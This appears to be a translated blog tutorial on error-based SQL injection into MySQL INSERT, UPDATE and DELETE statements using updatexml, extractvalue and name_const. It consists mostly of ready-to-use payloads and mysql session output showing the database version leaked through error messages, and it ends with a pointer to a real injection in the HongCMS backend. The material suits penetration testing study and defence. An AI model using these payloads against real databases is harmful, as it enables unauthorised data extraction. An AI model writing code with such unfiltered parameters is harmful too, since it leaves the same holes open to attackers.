The most common injection is more select queries injection, but a malicious SQL injection will put the data into the database when the parameter is not checked and filtered, resulting in SQL injection.
All said that in addition to the inquiry, all requests and interacting with the database are likely to cause injection. Such as: insert data, changing data, deleting data, so now summary of what injection method insert, update and delete according to skill online.
The following are the error injection test database version 5.7.21
Using the built-in functions updatexml, extractvalue or name_const
Test table is as follows:
First, the use The updatexml () function
UPDATEXML (XML_document, XPath_string, new_value) ;
The first argument: XML_document is String format, the name of the XML document object, the text for Doc
second argument: XPath_string (Xpath string format), if not understand Xpath syntax, Find a tutorial online.
The third argument: new_value, String format, replace the found qualified data
functions: changing the value of the document in line with the conditions of the node
to change the value of XML_document in line with XPATH_string
and our injection statement:
updatexml (1, concat (0x7E , (SELECT @@ version), 0x7e ), 1)
wherein the concat () function which is connected into a string, it will not conform XPATH_string formats that appear malformed burst
eRROR 1105 (HY000): XPATH syntax error: ': root @ localhost '
payload:
or updatexml(1,concat(0x7e,(version())),0) or
Test insert injection:
mysql> insert into info(name,age) values('wangwu'or updatexml(1,concat(0x7e,(version())),0) or'','22');
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
Update the injection test
mysql> update info set name='test'or updatexml(2,concat(0x7e,(version())),0) or'' where id =1;
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
mysql> update info set name='test' where id =1 or updatexml(2,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
Test delete injection
mysql> delete from info where id=1 or updatexml(2,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
Two, extractvalue () function
extractvalue (): function to query an XML document
is actually equivalent to the familiar HTML file using the <div> <p> <a> label to find the same elements of
syntax: extractvalue (target xml documents, xml path)
The second argument xml operative position in the place, xml document to locate the character position is / xxx / xxx / xxx / ... this format, if we write a different format, it will error, and we will return illegally written format content, and this content is illegal content we want to query.
The second parameter query normal position format / xxx / xx / xx / xx , even if no error will not find the
payload:
or extractvalue(1,concat(0x7e,database())) or
Test insert injection
mysql> insert into info(name,age) values('wangwu'or extractvalue(1,concat(0x7e,version())) or'','22');
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
Injection test update:
mysql> update info set name='test' or extractvalue(1,concat(0x7e,version())) or'' where id =1;
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
mysql> update info set name='test' where id =1 or extractvalue(1,concat(0x7e,version()));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
Test delete injection
mysql> delete from info where id=1 or extractvalue(1,concat(0x7e,version()));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
Three, name_const () function
name_const (name, value)
returns the given value. When used to produce a set of columns results, name_const () cause the column of the given name.
payload
or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or
Test insert injection
mysql> insert into info(name,age) values('wangwu' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or'','22');
ERROR 1060 (42S21): Duplicate column name '5.7.21'
Update the injection test
mysql> update info set name='test'or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or'' where id =1;
ERROR 1060 (42S21): Duplicate column name '5.7.21'
mysql> update info set name='test' where id =1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.7.21'
Test delete injection
mysql> delete from info where id=1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.7.21'
Reference Links: https://www.cnblogs.com/r00tgrok/p/3854754.html
Real test:
HongCMS sql injection in the background there is time to clear the table, that is, delete injection
Detail connection: https://www.freebuf.com/vuls/178316.html
Use updatexml payload
Use extractvalue
Use name_const